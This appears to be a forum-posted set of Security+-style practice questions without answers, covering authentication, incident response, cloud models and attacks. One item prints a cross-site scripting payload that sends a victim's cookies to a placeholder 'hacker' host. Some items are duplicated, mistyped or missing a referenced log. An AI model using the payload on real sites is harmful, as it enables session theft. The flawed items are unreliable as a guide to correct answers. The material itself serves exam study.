- An energy company in the final phase of testing its new billing service. The testing team wants to use production data to test the system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers?
- Back up and archive the production data to an external source
- Disable Notifications in the production system
- Scrub the confidential information
- Encrypt the data prior to the stress test
- A security manager discovers the most recent vulnerability scan report illustrates low-level, non-critical findings. Which of the following scanning concepts would BEST report critical threats?
- Non-credentialed scan
- Compliance Scan
- Intrusive Scan
- Application Scan
- Which of the following would be considered multifactor authentication?
- Hardware token and smart card
- Voice recognition and retina scan
- Strong password and fingerprint
- PIN and security questions
- To help prevent against an SQL injection, which of the following functions should the application developer implement?
- Error handling
- Code Signing
- Input Validation
- Model Verification
- A network technician is trying to set up a secure method for managing users and groups across the enterprise. Which of the following protocols is MOST likely to be used?
- LDAPS
- SFTP
- NTLM
- SNMPv3
- A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart on a popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes the type of user?
- Insider
- Script Kiddie
- Competitor
- Hacktivist
- APT
- An office recently completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include:
- Intellectual property
- Payroll records
- Financial information
- Drug screening results
Which of the following is the BEST way to dispose of these items?
- Shredding
- Pulping
- Deidentifying
- Recycling
- A security engineer is working with the CSIRT to investigate a recent breach of client data due to the improper use of cloud-based tools. The engineer finds that an employee was able to access a cloud-based storage platform from the office and upload data for the purposes of doing work from home after hours. Such activity is prohibited by policy, but no preventive control is in place to block such activities. Which of the following controls would have prevented this breach?
- Network-based IPS
- Host-based DLP
- Host-based IDS
- NAC using TACACS+
- A security administrator is performing a test to determine if a server is vulnerable to compromise through unnecessary ports. Which of the following tools would assist the security administrator in gathering the request information?
- Tcpdump
- Netcat
- Nslookup
- Nmap
- Dig
- A security administrator is configuring a RADIUS server for wireless authentication. The configuration must ensure client credentials are encrypted end-to-end between the client and the authenticator. Which of the following protocols should be configured on the RADIUS server? (select TWO)
- PAP
- MSCHAP
- PEAP
- NTLM
- SAML
- A CSIRT has completed restoration procedures related to a breach of sensitive data and is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO)
- A summary of approved policy changes based on the outcome of the incident
- Details of any communication challenges that hampered initial response times
- Details of man-hours and related costs associated with the breach, including lost revenue
- Details regarding system restoration activities completed during the response activity
- Suggestions for potential areas of focus during quarterly training activities
- Suggestions of tools that would provide improved monitoring and auditing of system access
- Joe, a contractor, is hired by a firm to perform a penetration test against the firm’s infrastructure. When conducting the scan, he receives only the network diagram and the network list to scan against the network. Which of the following scan types is Joe performing?
- Authenticated
- White box
- Automated
- Gray box
- Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request?
- Retinal scan
- Passphrase
- Token fob
- Security question
- Which of the following computer recovery sites is the least expensive and the most difficult to test at the same time?
- Non-mobile hot site
- Mobile hot site
- Warm site
- Cold site
- After a recent security breach at a hospital, it was discovered that nursing staff members, who were working the overnight shift, searched for and accessed private health information for local celebrities who were patients at the hospital. Which of the following would have enabled the hospital to discover this behavior BEFORE a breach occurred?
- Time-of-day restrictions
- Usage reviews
- Periodic permission audits
- Location-based policy enforcement
- An organization wants to move its operation to the cloud. The organization’s systems administrators will still maintain control of the servers, firewalls, and load balancers in the cloud environment. Which of the following models is the organization considering?
- Saas
- Iaas
- Paas
- Maas
- Which of the following access management concepts in associated with the permissions?
- Authentication
- Accounting
- Authorization
- Identification
- An organization would like to grant access to its wireless network to users who are visiting from another trusted organization by authenticating the visiting users at their home organization. Which of the following is the organization’s BEST option?
- RADIUS Federation
- Captive portal
- OCSP
- Certificate Chairing
- An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (select TWO).
- Familiarity
- Scarcity
- Urgency
- Authority
- Consensus
- Which of the following is a compensating control that will BEST reduce the risk of weak passwords?
- Requiring the use of one-time tokens
- Increasing password history retention court
- Disabling user accounts after exceeding maximum attempts
- Setting expiration of user passwords to a shorter time
- Which of the following is a compensating control that will BEST reduce the risk of weak passwords?
- Requiring the use of one-time tokens
- Increasing password history retention count
- Disabling user accounts after exceeding maximum attempts
- Setting expiration of user passwords to a shorter time
- A company has just adopted the BYOD department methodology. The company is unsure how to address the new trend and has requested assistance from a consultant. Given this scenario, which of the following should the consultant recommend? (Select TWO).
- Use password-enabled lock screens
- Implement an MDM solution
- Configure time-of-day restrictions
- Disabled personal email
- Implement application whitelisting
- Deny access to the corporate portal
- The payroll department has contacted the security team regarding an anomaly with amounts paid via the weekly payroll file. The security analyst is provided the following log from the server: which of the following is the MOST likely reason for the anomaly?
- The file was corrupted in transit
- The file was transferred to the wrong destination
- The connection was refused by the destination
- The file was compromised before being sent
- A security engineer is configuring a wireless network. The security requirements for the network are:
-mutual authentication of wireless clients and the authentication server
-client authentication must be username and password
-Cannot use a certificate on the authentication server
Which of the following protocols BEST meets these requirements?
- EAP
- EAP-TLS
- EAP-TTLS
- EAP-FAST
- A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment?
- Trojan
- Polymorphic worm
- Rootkit
- Logic bomb
- Armored virus
- A security administrator wants to implement least privilege access for a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implementing discretionary access control. The following controls are available:
- Read = A user can read the content of an existing file.
- Write = A user can modify the content of an existing file and delete an existing file.
- Create = A user can create a new file and place data within the file.
A missing control means the user does not have that access. Which of the following configurations provides the appropriate control to support the organization’s requirements?
- Owners: Read, Write, Create
Group Members: Read, Write
Others: Read, Create
- Owners: Write, Create
Group Members: Read, Write, Create
Others: Read
- Owners: Read, Write
Group Members: Read, Create
Others: Read, Create
- Owners: Write, Create
Group Members: Read, Create
Others: Read, Write, Create
- An attacker exploited a vulnerability on a mail server using the code below.
<HTML><body
Onload=document.location.replace(‘ http://hacker/post.asp?victim&message =” + document.cookie + “<br>” + URL: +”document.location);/>
</body>
<?HTML>
Which of the following BEST explains what the attacker is doing?
- The attacker is replacing a cookie
- The attacker is stealing a document
- The attacker is replacing a document
- The attacker is deleting a cookie
- A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops’ local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this?
- Put the desktop in the DMZ
- Create a separate VLAN for the desktops
- Air gap the desktops
- Join the desktops to an ad-hoc network
- A company was recently audited by a third party. The audit revealed the company’s network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files?
- HTTPS
- LDAPS
- SCP
- SNMPv3
- Which of the following differentiates ARP poisoning from a MAC Spoofing attack?
- ARP poisoning uses unsolicited ARP replies
- ARP poisoning overflows a switch’s CAM table
- MAC spoofing uses DHCPOFFER/DHCPACK packets
- MAC spoofing can be performed across multiple routers
- An active/passive configuration has an impact on:
- Confidentiality
- Integrity
- Availability
- Non-repudiation
- During a routine review of firewall log reports, a security technician notices multiple successful logins for the admin user during unusual hours. The technician contacts the network administrator, who confirms the logins were not related to the administrator’s activities. Which of the following is the MOST likely reason for these logins?
- Firewall maintenance service windows were scheduled
- Default credentials were still in place
- The entries in the log were caused by the file integrity monitoring system
- A blue team was conducting a penetration test on the firewall
- A member of the IR team has identified an infected computer. Which of the following IF phrases should the team member conduct NEXT?
- Eradication
- Recovery
- Lessons learned
- Containment
- A security engineer at a manufacturing company is implementing a third-party cloud application. Rather than create users manually in the application, the engineer decides to use the SAML protocol. Which of the following is being used for this implementation?
- The manufacturing company is the service provider, and the cloud company is the identity provider.
- The manufacturing company is the authorization provider, and the cloud company is the service provider.
- The manufacturing company is the identity, and the cloud company is the service provider.
- The manufacturing company is the identity provider, and the cloud company is the service provider.
- The manufacturing company is the service provider, and the cloud company is the authorization provider
kay54321 liked
ReplyQuote
Working